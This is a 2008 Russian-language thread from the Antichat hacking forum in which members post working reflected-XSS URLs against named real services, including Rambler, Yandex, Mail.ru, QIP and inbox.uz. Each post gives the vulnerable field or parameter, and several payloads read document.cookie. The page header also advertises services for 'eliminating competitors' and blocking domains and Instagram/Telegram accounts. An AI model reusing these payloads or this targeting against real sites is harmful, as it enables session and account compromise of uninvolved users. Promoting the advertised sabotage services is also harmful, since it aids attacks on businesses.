Пассивные xss на почтовых серверах

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Пассивные xss на почтовых серверах

Страница 1 из 25

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

Пассивные xss на почтовых серверах

25.10.2008, 15:54

Constantine

Members of Antichat - Level 5

Регистрация: 24.11.2006

Сообщений: 927

С нами: 10243046

Репутация: 3033

Пассивные xss на почтовых серверах

Выкладываем только пассивные xss на почтовых серверах (для активных xss существует отдельная тема)

Оффтоп наказуем

p\s Невозбраняется выложить рабочии xss из аналогичной темы (в разделе Уязвимости), что канула в лету

𝕏 Twitter Reddit Telegram Копировать ссылку

__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ

26.10.2008, 11:32

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

С нами: 9382468

Репутация: 104

rambler.ru

http://olymp2006.rambler.ru/shedule.html?day=%3Cscript%3Ealert%20('XSS')%3C/script%3E

26.10.2008, 21:55

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

С нами: 9655526

Репутация: 1334

http://top100.rambler.ru/cgi-bin/reg...p=0&reg=accept

Во всех полях вставляем "><script>alert('xss')</script>

http://goon.ru/i/phone/rus_moscow.htm

В поле Поиск по фамилии "><script>alert('xss')</script>

http://catalog.aport.ru/rus/add/AddUrl.aspx

В Адрес ресурса вставляем "><script>alert('xss')</script>

27.10.2008, 06:26

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

С нами: 9382468

Репутация: 104

Ramber.ru

http://ds.rambler.ru/index.php?p=news&pubId=1365&pubMode="><script>aler t(/TreV@N/)</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5"><script>alert( 'TreV@N')</script>&form=0&hu=1&what=0

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0&hu=1&wha t=0"><script>alert('TreV@N')</script>

http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=TreV%40N&ftype=5&form=0"><script >alert('TreV@N')</script>&hu=1&what=0

15.11.2008, 22:41

S0ulVortex

Участник форума

Регистрация: 18.11.2007

Сообщений: 184

С нами: 9725544

Репутация: 246

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

20.11.2008, 00:23

foopi

Познающий

Регистрация: 26.10.2008

Сообщений: 50

С нами: 9232225

Репутация: 62

пара уязвимостей на qip:
http://pochta.qip.ru/mailbox/find/?actionID=1&search=%22%3E%3Cscript%3Ealert()%3C/script%3E
http://file.qip.ru/preview.jsp?w=200'&h=200'&s=no&b=yes&l=http://slipknot1.ru%22%3E%3C/iframe%3E%3Cscript%3Ealert()%3C/script%3E

20.11.2008, 01:22

.dimoN.

Участник форума

Регистрация: 08.04.2008

Сообщений: 150

С нами: 9521415

Репутация: 136

Цитата:

Сообщение от S0ulVortex

Решил выложить XSS найденную лично мной

Код:

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

по твоему же примеру

Код:

http://nova.rambler.ru/srch?query=%3C%2Fscript%3E%3Cscript%3Ealert(%27XSS%27)%3C%2Fscript%3E

22.11.2008, 02:28

~~cash$$$~~

Banned

Регистрация: 06.01.2008

Сообщений: 413

С нами: 9655526

Репутация: 1334

http://inbox.uz/
'><script>alert(/xss/)</script>
Уязвимые поля Логин и пароль.

23.11.2008, 20:45

Ded MustD!e

Members of Antichat - Level 5

Регистрация: 23.08.2007

Сообщений: 417

С нами: 9851426

Репутация: 3908

http://help.rambler.ru/feedback.html?s=7715&fio="><script>alert('XSS')</script>
http://rasp.yandex.ru/info/996500"><script>alert('XSS')</script>
http://horoscopes.rambler.ru/fortune.html?sec=56576"><script>alert('XSS')</script>
http://story.travel.mail.ru/?mod=add_story&back="><script>alert(document.cooki e)</script>
http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert(document.co okie)</script>
http://skate.rambler.ru/popup.html?alt=</title><script>alert(document.cookie)</script>
http://www.pisem.net/download.php/?file="><script>alert('XSS')</script>
http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>
http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

Последний раз редактировалось Ded MustD!e; 23.11.2008 в 21:03..

#10

25.11.2008, 16:57

Luccifer

Познающий

Регистрация: 05.12.2006

Сообщений: 63

С нами: 10227528

Репутация: 100

http://nova.rambler.ru/srch?query=%3C/title%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

http://sub.rambler.ru/catalog/rambler/news/?login="><script>alert('XSS')</script>

http://health.rambler.ru/drugs/pharmacy.html?phid=37"><script>alert('XSS')</script>

http://miss.rambler.ru/srch/?sort=0&set=miss&words="><script>alert('Luccifer') </script>

http://top100.rambler.ru/cgi-bin/register.cgi?group=49&reg=accept
в поле URL Вашей страницы:
Код:
"><script>alert(document.cookie)</script

Последний раз редактировалось Luccifer; 25.11.2008 в 17:03..

Страница 1 из 25

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ]	Cawabunga	Веб-уязвимости	43	12.01.2021 19:31
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход